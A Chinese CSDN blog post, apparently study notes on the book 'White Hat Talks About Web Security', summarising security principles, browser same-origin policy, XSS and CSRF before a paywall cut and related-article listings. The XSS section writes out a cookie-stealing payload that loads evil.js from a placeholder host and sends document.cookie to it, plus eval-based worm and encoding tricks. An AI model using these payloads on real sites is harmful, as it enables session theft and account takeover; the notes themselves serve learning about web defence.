《白帽子讲Web安全》读书笔记

最新推荐文章于 2022-03-11 17:22:38 发布
最新推荐文章于 2022-03-11 17:22:38 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 笔记摘要 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leng_que/article/details/44873791
版权
本文是《白帽子讲Web安全》一书的读书笔记,深入探讨了Web安全的基础概念和高级策略,包括安全三要素、白帽子兵法、浏览器安全、XSS与CSRF、SQL注入防御、文件上传漏洞、认证授权机制、DDoS攻击及防御、业务逻辑安全等多个方面,旨在提升Web应用的安全性。
摘要由CSDN通过智能技术生成 
------

“安全问题的本质是信任的问题”

安全三要素:机密性、完整性、可用性

白帽子兵法:Secure By Default 原则(1:黑白单、白名单 2:最小权限原则)、纵深防御原则、数据与代码分离原则、不可预测性原则

“所有的程序本来也没有漏洞,只有功能,但当一些功能被用于破坏,造成损失时,也就成了漏洞。”

浏览器安全:同源策略、浏览器沙箱(备注:沙箱内的程序要与外界通信时是通过特殊封装的API进行的,这些API内部通常有着很强的安全检测)

------

XSS Payload:
<script src=http://xxx/evil.js></script>
evil.js 内容:
var img = document.createElement("img");
img.src = "http://xxx/log?"+escape(document.cookie);
document.body.appendChild(img);

XSS Worm:Samy Worm、百度空间蠕虫

<DIV id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="..."></DIV>

利用字符编码:%c1\(备注:基于字符集的攻击,让原来的两个字符变成一个Unicode字符,从而“吃掉”转义符)

eval(location.hash.substr(1))

------

Anti CSRF Token

(再次理解“同源策略”)
(区别 XSS
最低0.47元/天 解锁文章
leng_que
关注
专栏目录
读《白帽子Web安全》有感
分享与记录
01-20 1702
该博客转自hangshao.tech,之前忘记在CSDN发布了。 今天是2020.11.19,我开始了第二次拜读《白帽子Web安全》。 记得大一的时候就买过这本书,不过奈何当时水平有限,实在是难以阅读下去,于是放弃。我想,在大三的时候再来重拾这本书,应该会有所收获,如果还能作一个总结,那便更好,所以现在陆陆续续地写一些吧,写一点发一点,或许全部写完的时候,已经是2021年了。(在写了在写了…) 第一章是巨佬吴翰清述他的安全世界观。这一章国黑客史,介绍了白帽子和黑帽子,揭示了他认为的安全问题的本质
白帽子web安全读后感1
南浦
02-07 2528
白帽子web安全读后感1 本文实际上算是白帽子web安全的回顾,总结了一些我觉得比较重要的关键词,方便以后复习.具体内容可以参考书 浏览器安全 本文对应第2章节,主要的内容是同源策略.当然也可以参考阮一峰老师的文章 终止就是要保证协议,域名和端口的一致,如果看到提示cros错误就要考虑这个问题. 另外现在app开发喜欢采用浏览器套壳的策略,同时还有h5小程序开发,总之前端技术大有可为. 跨站脚本攻击(XSS) 本文是第三章 跨站脚本攻击(Cross Site Script,简称 XSS),利用网页开发时
白帽子web安全读后感
wswr的博客
03-11 1056
第一章 我的安全世界观 安全问题本质就是信任问题【你总要制定一个基准以此判断是否安全,这个基准怎么理解呢,比方上传文件,做的限制和过滤就是一个基准,通过这个基准你去信任自己是否是安全的】 安全是一个持续的过程【攻防都在进步,道高一尺魔高一丈,不断出现的漏洞和对应补丁就是很好的例子去理解为什么持续的安全白帽子兵法: Secure by Default(默认的安全)一方面是白名单思想【黑名单存在被各种可能的绕过】,一方面是最小权限原则(最差的情况即使被攻克了,拿到的权限也不高) 纵深防御原则:一方
白帽子Web安全 读书笔记
03-12
### 白帽子Web安全读书笔记一:关键知识点解析 #### 第零篇 总览 - **客户端脚本安全**:这部分主要关注浏览器环境下的安全问题,包括浏览器自身的安全机制以及用户与网页交互过程可能遇到的安全风险。 - **...
读书笔记白帽子Web安全.zip
07-26
读书笔记白帽子Web安全
读书笔记白帽子web安全思维导图.zip
07-26
读书笔记白帽子web安全思维导图
读书笔记:阅读《白帽子Web安全》+《Web前端黑客技术揭秘》动手demo.zip
最新发布
07-29
读书笔记:阅读《白帽子Web安全》+《Web前端黑客技术揭秘》动手demo
白帽子web安全》读后感之一
weixin_33928137的博客
09-02 323
本周的技术读物是《白帽子web安全》。 这本书让我认识了吴翰清,一个年轻的技术大牛。安全宝的负责人之一。关于安全方面是个小白的我,觉得***防御真的很神奇,希望多少了解一些,于是选择了这本红皮书。 好了,转入正题。今天看了第一部分--世界安全观。是大概念上安全的意识,还算比较简单。总结一下: 1.安全问题的本质是信任的问题。一切安全设计的方案的基础建立在信任的关...
白帽子web安全读后感2
南浦
02-13 2953
网络安全,本文是白帽子web安全的读后感
白帽子web安全 读书笔记
think_ycx的专栏
04-18 1697
回顾一下经典
白帽子web安全读书笔记以及读后感
Alexz__的博客
06-15 1877
因为本书作于2010年前,书所使用的部分技术版本已经过于老旧,很多书提到的攻击方法和绕过思路都已经严重落后,但之所以本书会成为安全界的经典必读书目,就是因为本书所讨论的安全思想尤为精华,对于企业来说的安全建设十分有用,所以我打算读这本书的过程主要记录下来一些重要的安全思路,绕过思想,重要的烧过姿势,不回去特意记录他所有的精工代码等等 对于IT这个领域来说10年的时间足矣改变整个行业的组织架构,走了很多,也来了很多 第一章 我的安全世界观 1.4 安全是一个持续的过程;破...
白帽子WEB安全——读书笔记(一)
雨山林稀的博客
04-28 854
安全的三要素CIA:机密性(confidentiality)、完整性(integrity)、可用性(availability)。
读书笔记----白帽子web安全--2015-11-27
u010459047的博客
11-27 1239
一,浏览器的同源策略       1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性      2. 但是在浏览器,某些标签是可以跨域加载资源:.,,利用这些标签加载其他未知文件会导致网站陷入不安全      3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。     4. ie8 c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值